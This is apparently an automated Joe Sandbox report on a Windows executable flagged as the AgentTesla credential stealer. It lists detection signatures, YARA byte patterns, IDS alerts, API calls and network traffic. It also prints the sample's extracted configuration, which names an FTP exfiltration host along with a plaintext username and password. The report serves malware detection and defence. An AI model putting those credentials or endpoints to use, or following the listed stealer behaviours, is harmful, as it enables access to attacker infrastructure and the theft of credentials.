Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
juE8dtqPkx.exe

Overview

General Information

Sample name:juE8dtqPkx.exe
renamed because original name is a hash value
Original sample name:2f089d43e47839f07590fc97fbd2bbe91f08ff02d50b3a6b7fe68f3e1a81026d.exe
Analysis ID:1588907
MD5:bd28f9a835c67ce45b3a3ca02f6737a2
SHA1:16dc478690c24f29b52186f0ed8c152007fdbaeb
SHA256:2f089d43e47839f07590fc97fbd2bbe91f08ff02d50b3a6b7fe68f3e1a81026d
Tags:exeRedLineStealeruser-adrian__luca
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected PureLog Stealer
AI detected suspicious sample
Check if machine is in data center or colocation facility
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • juE8dtqPkx.exe (PID: 2852 cmdline: "C:\Users\user\Desktop\juE8dtqPkx.exe" MD5: BD28F9A835C67CE45B3A3CA02F6737A2)
    • RegSvcs.exe (PID: 5060 cmdline: "C:\Users\user\Desktop\juE8dtqPkx.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • juE8dtqPkx.exe (PID: 4608 cmdline: "C:\Users\user\Desktop\juE8dtqPkx.exe" MD5: BD28F9A835C67CE45B3A3CA02F6737A2)
      • RegSvcs.exe (PID: 5056 cmdline: "C:\Users\user\Desktop\juE8dtqPkx.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.jeepcommerce.rs", "Username": "kel-bin@jeepcommerce.rs", "Password": "Jhrn)GcpiYQ7"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000002.2197062876.00000000016A0000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
    • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
    • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
    • 0x700:$s3: 83 EC 38 53 B0 10 88 44 24 2B 88 44 24 2F B0 64 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
    • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
    • 0x1e9d0:$s5: delete[]
    • 0x1de88:$s6: constructor or from DllMain.
    00000004.00000002.4674158790.0000000003152000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.4674158790.0000000003152000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000004.00000002.4676914984.00000000054A0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000004.00000002.4676914984.00000000054A0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            Click to see the 20 entries
            SourceRuleDescriptionAuthorStrings
            3.2.juE8dtqPkx.exe.16a0000.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
            • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
            • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
            • 0x700:$s3: 83 EC 38 53 B0 10 88 44 24 2B 88 44 24 2F B0 64 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
            • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
            • 0x1e9d0:$s5: delete[]
            • 0x1de88:$s6: constructor or from DllMain.
            4.2.RegSvcs.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
            • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
            • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
            • 0x700:$s3: 83 EC 38 53 B0 10 88 44 24 2B 88 44 24 2F B0 64 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
            • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
            • 0x1e9d0:$s5: delete[]
            • 0x1de88:$s6: constructor or from DllMain.
            4.2.RegSvcs.exe.2d706c6.2.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              4.2.RegSvcs.exe.2d706c6.2.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                4.2.RegSvcs.exe.2d706c6.2.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  Click to see the 87 entries
                  No Sigma rule has matched
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-11T07:01:46.494336+010020299271A Network Trojan was detected192.168.2.649726195.252.110.25321TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-11T07:01:47.075109+010028555421A Network Trojan was detected192.168.2.649738195.252.110.25365110TCP
                  2025-01-11T07:01:47.080748+010028555421A Network Trojan was detected192.168.2.649738195.252.110.25365110TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: juE8dtqPkx.exeAvira: detected
                  Source: http://ftp.jeepcommerce.rsAvira URL Cloud: Label: malware
                  Source: 4.2.RegSvcs.exe.2d706c6.2.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.jeepcommerce.rs", "Username": "kel-bin@jeepcommerce.rs", "Password": "Jhrn)GcpiYQ7"}
                  Source: juE8dtqPkx.exeVirustotal: Detection: 38%Perma Link
                  Source: juE8dtqPkx.exeReversingLabs: Detection: 63%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: juE8dtqPkx.exeJoe Sandbox ML: detected
                  Source: juE8dtqPkx.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: Binary string: _.pdb source: RegSvcs.exe, 00000004.00000002.4676035615.0000000004121000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4673435255.0000000002D2F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4673937156.00000000030A0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: juE8dtqPkx.exe, 00000000.00000003.2181560395.0000000004020000.00000004.00001000.00020000.00000000.sdmp, juE8dtqPkx.exe, 00000000.00000003.2180821812.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, juE8dtqPkx.exe, 00000003.00000003.2191440096.0000000004070000.00000004.00001000.00020000.00000000.sdmp, juE8dtqPkx.exe, 00000003.00000003.2194116768.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: juE8dtqPkx.exe, 00000000.00000003.2181560395.0000000004020000.00000004.00001000.00020000.00000000.sdmp, juE8dtqPkx.exe, 00000000.00000003.2180821812.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, juE8dtqPkx.exe, 00000003.00000003.2191440096.0000000004070000.00000004.00001000.00020000.00000000.sdmp, juE8dtqPkx.exe, 00000003.00000003.2194116768.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,3_2_004339B6
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,3_2_00452492
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00442886
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,3_2_004788BD
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,3_2_0045CAFA
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00431A86
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,3_2_0044BD27
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_0045DE8F FindFirstFileW,FindClose,3_2_0045DE8F
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_0044BF8B

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.6:49738 -> 195.252.110.253:65110
                  Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.6:49726 -> 195.252.110.253:21
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.2d706c6.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.2d6f7de.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.30a0ee8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4126458.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.54a0000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4125570.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4174790.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.30a0000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.4676914984.00000000054A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4673937156.00000000030A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: global trafficTCP traffic: 192.168.2.6:49738 -> 195.252.110.253:65110
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                  Source: Joe Sandbox ViewIP Address: 195.252.110.253 195.252.110.253
                  Source: unknownDNS query: name: ip-api.com
                  Source: unknownFTP traffic detected: 195.252.110.253:21 -> 192.168.2.6:49726 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 07:01. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 07:01. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 07:01. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 07:01. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: ip-api.com
                  Source: global trafficDNS traffic detected: DNS query: ftp.jeepcommerce.rs
                  Source: RegSvcs.exe, 00000004.00000002.4674158790.0000000003152000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.jeepcommerce.rs
                  Source: RegSvcs.exe, 00000004.00000002.4674158790.0000000003121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                  Source: RegSvcs.exe, 00000004.00000002.4674158790.0000000003121000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4676914984.00000000054A0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4676035615.0000000004121000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4673435255.0000000002D2F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4673937156.00000000030A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                  Source: RegSvcs.exe, 00000004.00000002.4674158790.0000000003121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: RegSvcs.exe, 00000004.00000002.4676914984.00000000054A0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4676035615.0000000004121000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4673435255.0000000002D2F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4673937156.00000000030A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,3_2_0045A10F
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C
                  Source: C:\Users\user\Desktop\juE8dtqPkx.exeCode function: 3_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,3_2_0047C81C

                  System Summary

                  barindex
                  Source: 3.2.juE8dtqPkx.exe.16a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.2d706c6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.2d706c6.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.4126458.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.4126458.7.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.30a0ee8.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.30a0ee8.3.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.2d6f7de.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.2d6f7de.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.30a0000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.30a0000.4.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.2d6f7de.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.2d6f7de.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.30a0ee8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.30a0ee8.3.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.4125570.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.4125570.6.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.4126458.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.4126458.7.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.4174790.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.4174790.5.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.54a0000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.54a0000.8.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.54a0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.54a0000.8.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.4125570.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.4125570.6.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 0.2.juE8dtqPkx.exe.2f60000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.4174790.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.4174790.5.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.2d706c6.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.2d706c6.2.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.30a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.30a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
